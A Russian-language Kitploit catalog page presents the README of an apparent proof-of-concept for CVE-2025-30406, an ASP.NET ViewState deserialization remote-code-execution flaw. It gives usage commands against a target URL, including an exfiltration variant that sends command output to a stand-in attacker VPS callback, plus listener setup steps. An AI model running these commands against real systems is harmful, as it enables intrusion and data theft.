Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-30406 — CVE-2025-30406 ViewState Exploit PoC | Kitploit
Инструменты/GitHubGitHub/mchklt/cve-2025-30406
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubmchklt/cve-2025-30406

CVE-2025-30406

CVE-2025-30406 ViewState Exploit PoC

Репозиторий
90181 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-30406 Эксплойт PoC для ViewState

Обзор

Этот скрипт Proof-of-Concept (PoC) демонстрирует эксплуатацию десериализации ViewState для CVE-2025-30406 в ASP.NET приложениях. Он использует ysoserial для генерации вредоносной полезной нагрузки ViewState и отправляет её на указанный URL для выполнения заданной команды. Для наилучшего результата вывод команды можно отправить на пользовательский HTTP-сервер (server.py), работающий на VPS, который отображает результаты в стилизованном формате с временными метками, зелёными приглашениями и белым текстом. Этот скрипт предназначен только для образовательных целей и должен использоваться исключительно на системах, где у вас есть явное разрешение на проведение тестирования безопасности. Несанкционированное использование незаконно и неэтично.

Детали CVE

  • CVE ID: CVE-2025-30406
  • Описание: Уязвимость десериализации в обработке ViewState ASP.NET, позволяющая удалённо выполнять код при наличии действительного ключа проверки и генератора.
  • Затронутые системы: ASP.NET приложения с уязвимыми конфигурациями ViewState.
  • Необходимые условия для эксплуатации:
    • Доступ к действительному ключу проверки ViewState и генератору.
    • Уязвимая конечная точка, принимающая параметры ViewState.

Содержимое репозитория

  • exploit.py: Основной скрипт PoC для генерации и отправки полезной нагрузки ViewState.
  • server.py: HTTP-сервер для получения и отображения выведенных команд в стилизованном формате.
  • README.md: Этот файл с инструкциями по установке и использованию.

Предварительные требования

  • Python 3.x
  • Библиотека requests (pip install requests)
  • Исполняемый файл ysoserial (Windows или аналог для вашей платформы)
  • Конечная точка уязвимого ASP.NET приложения
  • VPS или сервер для запуска server.py (рекомендуется для эксфильтрации)
  • Разрешение на тестирование целевой системы

Установка

  1. Клонируйте этот репозиторий:
    root@kitploit:~
    git clone https://github.com/yourusername/cve-2025-30406-poc.git
    cd cve-2025-30406-poc
    
  2. Установите необходимый пакет Python:
    root@kitploit:~
    pip install requests
    
  3. Загрузите ysoserial и поместите его в ту же директорию, что и exploit.py, или укажите путь к нему:
    • ysoserial на GitHub

Настройка на VPS (рекомендуется)

Для получения выведенных команд в стилизованном формате запустите server.py на VPS:

  1. Скопируйте server.py на ваш VPS (например, через scp):
    root@kitploit:~
    scp server.py user@your-vps-ip:/home/user/
    
  2. Убедитесь, что Python 3 установлен:
    root@kitploit:~
    sudo apt update && sudo apt install python3 python3-pip
    
  3. Запустите сервер (порт по умолчанию 8000):
    root@kitploit:~
    python3 server.py
    
  4. Убедитесь, что брандмауэр VPS разрешает входящий трафик на порт 8000:
    root@kitploit:~
    sudo ufw allow 8000
    
  5. Запомните публичный IP или домен VPS (например, http://your-vps-ip:8000) для использования с флагом -e в exploit.py.

Использование

Запуск эксплойта

Запустите exploit.py с обязательными аргументами. Флаг -e необязателен, но настоятельно рекомендуется для эксфильтрации вывода команды на server.py для стилизованного отображения.

root@kitploit:~
python exploit.py -u <target_url> -c <command> [-y <ysoserial_path>] [-e <callback_url>]

Аргументы

  • -u, --url: Целевой URL (например, http://target.com/page.aspx) [Обязательный]
  • -c, --command: Выполняемая команда (например, whoami) [Обязательный]
  • -y, --ysoserial: Путь к исполняемому файлу ysoserial (по умолчанию: ./ysoserial.exe) [Необязательный]
  • -e, --exfil: URL обратного вызова для эксфильтрации вывода команды (например, http://your-vps:8000) [Необязательный]

Примеры

  1. Запуск без эксфильтрации (слепое выполнение):
    root@kitploit:~
    python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe
    
  2. Запуск с эксфильтрацией на VPS, где запущен server.py (рекомендуется):
    root@kitploit:~
    python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe -e http://your-vps:8000
    

Запуск сервера

На вашем VPS или локальной машине запустите HTTP-сервер для получения эксфильтрированных данных:

root@kitploit:~
python3 server.py

Сервер будет отображать вывод команд с временными метками, зелёным приглашением $ и белым текстом для удобства чтения.

Принцип работы

  1. Скрипт эксплойта (exploit.py):
    • Использует ysoserial с жёстко закодированным ключом проверки и генератором для создания полезной нагрузки ViewState.
    • Если указан -e, команда оборачивается для захвата вывода и отправки его на URL обратного вызова через Invoke-WebRequest.
    • Отправляет полезную нагрузку целевой URL в POST-запросе, встраивая её в параметр __VIEWSTATE.
    • Выводит статус ответа сервера и часть тела ответа.
  2. HTTP-сервер (server.py):
    • Ожидает GET-запросы, содержащие вывод команды.
    • Декодирует путь URL и разбивает его на строки.
    • Выводит каждую строку с временной меткой, зелёным приглашением $ и белым текстом вывода.
    • Отвечает статусом HTTP 200 и “OK”.

Предупреждение об этичном использовании

  • Этот скрипт является доказательством концепции для CVE-2025-30406, предназначенным для образовательных целей и авторизованного тестирования безопасности.
  • Не используйте этот скрипт на системах без явного разрешения владельца системы.
  • Неправильное использование может нарушить законы, включая Закон о компьютерном мошенничестве и злоупотреблениях (CFAA) в США или аналогичные законы в других странах.
  • Всегда получайте письменное согласие перед тестированием любой системы.
  • Сообщайте об уязвимостях ответственно, через скоординированное раскрытие или программы bug bounty.

Ограничения

  • Жёстко закодированный ключ проверки и генератор могут работать только для конкретных уязвимых приложений. Пользователям могут потребоваться значения, специфичные для приложения.
  • Эксплойт нацелен на ASP.NET приложения, уязвимые к десериализации ViewState.
  • Скрипт предполагает, что целевой сервер корректно обрабатывает полезную нагрузку ViewState.
  • Кроссплатформенная совместимость зависит от доступности ysoserial (в основном на Windows).
  • Эксфильтрация требует общедоступного сервера для URL обратного вызова -e.

Лицензия

Этот проект лицензирован по лицензии MIT. Подробнее см. в файле LICENSE.

Контакты

По вопросам или для обратной связи, пожалуйста, откройте issue в этом репозитории.

Скачать инструмент